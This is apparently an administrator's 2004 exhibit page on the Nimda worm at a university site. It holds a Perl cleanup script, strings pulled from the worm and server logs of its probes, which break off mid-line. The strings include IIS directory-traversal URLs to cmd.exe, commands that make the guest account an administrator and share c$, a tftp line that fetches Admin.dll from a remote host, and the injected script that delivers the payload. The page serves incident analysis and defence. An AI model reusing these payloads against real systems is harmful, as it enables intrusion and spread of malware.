December 22, 2004

When Things suddenly went wrong: w32.nimda.a@mm - Exhibits

Exhibits related to the Nimda attack at www.iimcal.ac.in


Exhibit A - CleanScript.pl (The script to clean the script in the infected file heirarchy.)


#!/usr/bin/perl

#Change this with the starting point of your
# directory dump
$dir = "/home/n_ravikiran/Website";

&listdirectory($dir);

sub listdirectory
{
local($dir);
local(@lines);
local($subdir);
local($lvl_counter);
local($list_length);

$dir = $_[0];
if(opendir (DIR, $dir))
{
@lines = readdir (DIR);
closedir (DIR);
$lvl_counter = 2;
$list_length = ( scalar @lines );
while ($lvl_counter < $list_length)
{
$subdir = $dir."/".$lines[$lvl_counter];
if(opendir (SUBDIR, $subdir))
{
closedir (SUBDIR);
&listdirectory($subdir);
}
else
{
&processnames($subdir);
}
$lvl_counter++;
}
}
}

sub processnames {
$filecount++;
open(FP,$_[0]);
@totalFile = <FP>;
close(FP);
open(FP,">$_[0]");
foreach $line (@totalFile)
{
if( $line =~ /readme.eml/)
{
print ($line);
}
else
{
print FP $line;
}
}

close(FP);

print ("$filecount $_[0]\n");
}


Exhibit B - Interesting Strings


a) Some Registry Entries.


System\CurrentControlSet\Services\VxD\MSTCP
NameServer
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China


b) The header of the mail file. Note the content type
is called wave ;) the neat trick used to deliver an executable
file. The file however is called readme.exe


MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="
--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>
--====_ABC1234567890DEF_====

c) Some more beautiful ideas. The hiding mechanism of
the virus in case cleaning is done from the dos prompt or
otherwise. Causing the setup to 'update' the machine with
the virus at boot time.

NUL=
[rename]
\wininit.ini

d) Payload attack method. Notice the enabling of the sharing.
Then the Administrator access to guests. The hiding of the
file extensions. (The reason for this is wonderful. readme.
exe comes with an icon that looks like that of HTML files
of IE, with the symbol 'e'. If extensions are displayed this
method of inducing users to execute the file would fail)

Personal
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
\*.*
EXPLORER
fsdhqherwqi2001
SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security
share c$=c:\
user guest ""
localgroup Administrators guest /add
localgroup Guests guest /add
user guest /active
open
user guest /add
HideFileExt
ShowSuperHidden
Hidden
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
\\%s
%ld %ld %ld
%ld %ld

e) On NT, hiding and maybe a timebomb? Note the counter...

ID Process
Elapsed Time
Priority Base
Working Set Peak
Working Set
% User Time
% Privileged Time
% Processor Time
Process
Counter 009
software\microsoft\windows nt\currentversion\perflib\009
Counters
Version
Last Counter
software\microsoft\windows nt\currentversion\perflib

f) NT again. Attack on IIS this way.

/scripts
/MSADC
/scripts/..%255c..
/_vti_bin/..%255c../..%255c../..%255c..
/_mem_bin/..%255c../..%255c../..%255c..
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c..
/scripts/..%c1%1c..
/scripts/..%c0%2f..
/scripts/..%c0%af..
/scripts/..%c1%9c..
/scripts/..%%35%63..
/scripts/..%%35c..
/scripts/..%25%35%63..
/scripts/..%252f..
/root.exe?/c+
/winnt/system32/cmd.exe?/c+
net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest"
tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20
Admin.dll
c:\Admin.dll
d:\Admin.dll
e:\Admin.dll

g) The added string for delivery of payload. This started it all.

<html><script language="JavaScript">window.open("readme.eml",null, "resizable=no,top=6000,left=6000")</script></html>
/Admin.dll
GET %s HTTP/1.0
Host: www
Connnection: close

h) Unknown agenda of the payload. Winzip is not infected,
says symantec. The dll that is infected and that prevents
Word from working properly (or any editor that uses it). The
string that goes into the system.ini file.

readme
main
index
default
html
.asp
.htm
\readme.eml
.exe
winzip32.exe
riched20.dll
.nws
.eml
.doc
.exe
dontrunold

i) Some references that show the work that the payload does on the user side.

gethostbyname
gethostname
sendto
send
recvfrom
recv

MAPILogoff
MAPISendMail
MAPIFreeBuffer
MAPIReadMail
MAPIFindNext
MAPIResolveName
MAPILogon
MAPI32.DLL

Subject:
From: <
DATA
RCPT TO: <
MAIL FROM: <
HELO
aabbcc
-dontrunold
NULL
\readme*.exe
admin.dll
qusery9bnow
-qusery9bnow
\mmc.exe
\riched20.dll
boot
Shell
explorer.exe load.exe -dontrunold
\system.ini
\load.exe
octet

j) Some more Registry Entries

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
Type
Remark
SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\X$
Parm2enc
Parm1enc
Flags
Path
SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\
SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan
SYSTEM\CurrentControlSet\Services\lanmanserver\Shares
Cache
Software\Microsoft\Windows\CurrentVersion\Explorer\MapMail
QUIT


Exhibit C - Nimda Attack Sequence

The following lines were the logs of the attack on the Linux machine by a particular IIS server. Although our IIS server fell to the first of these attacks, the Linux server has been braving the blizzard all along. Okay the worm cannot hit it, yet the feeling of safety is great. Initially this was restricted to 203. addresses, but now we are having attacks from all sorts of ip ranges. Also another thing to note is that the attacks have become particularly nasty on this machine, while the patched IIS server was subsequently left alone. Seems as if the choosen one for attack is not entirely random.

203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /scripts/root.exe?/c+dir
HTTP/1.0" 404 292 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 290 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /c/winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 300 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /d/winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 300 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 314 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 331 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 331 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 347 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 313 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 313 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:30 +0530] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 313 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:30 +0530] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 313 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:30 +0530] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 400 297 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:30 +0530] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 400 297 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:30 +0530] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 314 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:30 +0530] "GET /scripts/..%252